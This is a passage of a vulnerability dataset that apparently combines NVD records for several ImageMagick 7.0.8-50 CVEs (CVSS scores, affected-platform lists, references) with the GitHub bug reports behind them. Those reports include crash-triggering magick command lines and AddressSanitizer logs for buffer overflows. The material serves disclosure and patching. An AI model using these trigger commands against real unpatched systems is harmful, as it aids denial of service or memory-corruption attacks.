"cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/ImageMagick/ImageMagick/issues/1614
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's a stack buffer overflow at coders/pnm.c:1762 in WritePNMImage. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run_cmd: `magick -seed 0 -render "(" magick:rose -sample 846x913^+16+22 -white-threshold 112 ")" -compress None -adjoin tmp` Here's ASAN log. ``` ================================================================= ==9828==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffcc293daa0 at pc 0x7f71ad7e3477 bp 0x7ffcc293a0f0 sp 0x7ffcc293a0e8 WRITE of size 1 at 0x7ffcc293daa0 thread T0 #0 0x7f71ad7e3476 in WritePNMImage coders/pnm.c:1762:21 #1 0x7f71ad07c065 in WriteImage MagickCore/constitute.c:1159:16 #2 0x7f71ad07cf8c in WriteImages MagickCore/constitute.c:1376:13 #3 0x7f71aca4050d in CLINoImageOperator MagickWand/operation.c:4796:14 #4 0x7f71aca441cc in CLIOption MagickWand/operation.c:5258:7 #5 0x7f71ac885f6d in ProcessCommandOptions MagickWand/magick-cli.c:529:3 #6 0x7f71ac886d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #7 0x7f71ac8d0ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #8 0x526f95 in MagickMain utilities/magick.c:149:10 #9 0x5268e1 in main utilities/magick.c:180:10 #10 0x7f71a7347b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x41b069 in _start (install/bin/magick+0x41b069) Address 0x7ffcc293daa0 is located in stack of thread T0 at offset 14752 in frame #0 0x7f71ad7e1daf in WritePNMImage coders/pnm.c:1522 This frame has 6 object(s): [32, 4128) 'buffer' (line 1523) [4256, 8352) 'magick' (line 1523) [8480, 12576) 'type117' (line 1675) [12704, 14752) 'pixels' (line 1736) <== Memory access at offset 14752 overflows this variable [14880, 16928) 'pixels255' (line 1788) [17056, 19104) 'pixels381' (line 1857) HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow coders/pnm.c:1762:21 in WritePNMImage ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-21 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 ./configure --disable-openmp <!-- Thanks for reporting the issue to ImageMagick! -->
stack-buffer-overflow at coders/pnm.c:1762 in WritePNMImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1614/comments
4
2019-06-21T06:36:50Z
2019-08-10T11:27:40Z
https://github.com/ImageMagick/ImageMagick/issues/1614
459,035,202
1,614
495
CVE-2019-13307
2019-07-05T01:15:10.687
ImageMagick 7.0.8-50 Q16 has a heap-based buffer overflow at MagickCore/statistic.c in EvaluateImages because of mishandling rows.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/025e77fcb2f45b21689931ba3bf74eac153afa48" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1615" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/91e58d967a92250439ede038ccfb0913a81e59fe" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4715" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/025e77fcb2f45b21689931ba3bf74eac153afa48" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1615" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/91e58d967a92250439ede038ccfb0913a81e59fe" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4715" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/ImageMagick/ImageMagick/issues/1615
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's a heap-buffer-overflow at MagickCore/statistic.c:559:43 in EvaluateImages. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run_cmd: `magick -seed 0 -monitor -bias 63 "(" magick:rose -colorize 172,35,77 ")" "(" magick:logo +repage ")" -crop 507x10'!'+20-54 -evaluate-sequence Median tmp` Here's ASAN log. ``` ================================================================= ==10817==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000c80 at pc 0x7f0648490e06 bp 0x7ffce3c96900 sp 0x7ffce3c968f8 WRITE of size 8 at 0x611000000c80 thread T0 #0 0x7f0648490e05 in EvaluateImages MagickCore/statistic.c:559:43 #1 0x7f0647aa55bf in CLIListOperatorImages MagickWand/operation.c:4084:22 #2 0x7f0647aaf35e in CLIOption MagickWand/operation.c:5279:14 #3 0x7f06478f0a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #4 0x7f06478f1d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #5 0x7f064793bba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #6 0x526f95 in MagickMain utilities/magick.c:149:10 #7 0x5268e1 in main utilities/magick.c:180:10 #8 0x7f06423b2b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x41b069 in _start (install/bin/magick+0x41b069) 0x611000000c80 is located 0 bytes to the right of 256-byte region [0x611000000b80,0x611000000c80) allocated by thread T0 here: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7f064832b0b6 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f064832b11f in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7f06484926e7 in AcquirePixelThreadSet MagickCore/statistic.c:182:33 #4 0x7f0648490b21 in EvaluateImages MagickCore/statistic.c:499:19 #5 0x7f0647aa55bf in CLIListOperatorImages MagickWand/operation.c:4084:22 #6 0x7f0647aaf35e in CLIOption MagickWand/operation.c:5279:14 #7 0x7f06478f0a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #8 0x7f06478f1d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #9 0x7f064793bba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #10 0x526f95 in MagickMain utilities/magick.c:149:10 #11 0x5268e1 in main utilities/magick.c:180:10 #12 0x7f06423b2b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/statistic.c:559:43 in EvaluateImages ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-22 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 ./configure --disable-openmp <!-- Thanks for reporting the issue to ImageMagick! -->
heap-buffer-overflow at MagickCore/statistic.c:559:43 in EvaluateImages
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1615/comments
6
2019-06-22T02:11:22Z
2019-08-10T11:30:08Z
https://github.com/ImageMagick/ImageMagick/issues/1615
459,421,750
1,615
498
CVE-2019-13308
2019-07-05T01:15:10.750
ImageMagick 7.0.8-50 Q16 has a heap-based buffer overflow in MagickCore/fourier.c in ComplexImage.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/61135001a625364e29bdce83832f043eebde7b5a" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1595" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/19651f3db63fa1511ed83a348c4c82fa553f8d01" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00007.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/61135001a625364e29bdce83832f043eebde7b5a" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1595" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/19651f3db63fa1511ed83a348c4c82fa553f8d01" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00007.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/ImageMagick/ImageMagick/issues/1595
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's a heap-buffer-overflow in MagickCore/fourier.c:299:18 in ComplexImage, and I compiled the lasted version with --disable-openmp option. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run cmd: `magick -seed 0 -mattecolor rgb"("225,230,14")" -debug Configure "(" magick:wizard +repage ")" "(" magick:netscape +repage ")" -fuzz 82 -caption "j$Y%Be" -blue-primary 727,475 -crop 405%-43-16 -crop 832x886>+11-13 -complex magnitude-phase tmp` and also this command `magick -seed 0 "(" magick:netscape +repage ")" "(" magick:wizard -resample 24x44 -resample 47x83 ")" "(" magick:netscape -charcoal 4 -random-threshold 42x71 -shade 81x21 ")" -complex magnitude-phase tmp112 ` Here's ASAN result. ``` ==9231==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fd97efce800 at pc 0x7fd98dbdd221 bp 0x7ffff99e9790 sp 0x7ffff99e9788 WRITE of size 4 at 0x7fd97efce800 thread T0 #0 0x7fd98dbdd220 in ComplexImages MagickCore/fourier.c:299:18 #1 0x7fd98d4038c1 in CLIListOperatorImages MagickWand/operation.c:3890:22 #2 0x7fd98d40f34e in CLIOption MagickWand/operation.c:5276:14 #3 0x7fd98d250a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #4 0x7fd98d251d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #5 0x7fd98d29bba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #6 0x526f95 in MagickMain utilities/magick.c:149:10 #7 0x5268e1 in main utilities/magick.c:180:10 #8 0x7fd987d12b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x41b069 in _start (install/bin/magick+0x41b069) 0x7fd97efce800 is located 0 bytes to the right of 3686400-byte region [0x7fd97ec4a800,0x7fd97efce800) allocated by thread T0 here: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7fd98dc8a666 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7fd98d9d36ac in OpenPixelCache MagickCore/cache.c:3728:46 #3 0x7fd98d9d9991 in GetImagePixelCache MagickCore/cache.c:1754:18 #4 0x7fd98d9dfc59 in SyncImagePixelCache MagickCore/cache.c:5494:28 #5 0x7fd98dc3dfc1 in SetImageStorageClass MagickCore/image.c:2627:10 #6 0x7fd98dbdb4f7 in ComplexImages MagickCore/fourier.c:185:7 #7 0x7fd98d4038c1 in CLIListOperatorImages MagickWand/operation.c:3890:22 #8 0x7fd98d40f34e in CLIOption MagickWand/operation.c:5276:14 #9 0x7fd98d250a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7fd98d251d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7fd98d29bba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7fd987d12b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/fourier.c:299:18 in ComplexImages ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-17 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 ./configure --disable-openmp <!-- Thanks for reporting the issue to ImageMagick! -->
heap-buffer-overflow in MagickCore/fourier.c:299:18 in ComplexImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1595/comments
3
2019-06-17T02:21:01Z
2019-08-13T11:59:01Z
https://github.com/ImageMagick/ImageMagick/issues/1595
456,713,579
1,595
499
CVE-2019-13309
2019-07-05T01:15:10.813
ImageMagick 7.0.8-50 Q16 has memory leaks at AcquireMagickMemory because of mishandling the NoSuchImage error in CLIListOperatorImages in MagickWand/operation.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/5f21230b657ccd65452dd3d94c5b5401ba691a2d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1616" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/5982632109cad48bc6dab867298fdea4dea57c51" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/5f21230b657ccd65452dd3d94c5b5401ba691a2d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1616" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/5982632109cad48bc6dab867298fdea4dea57c51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": 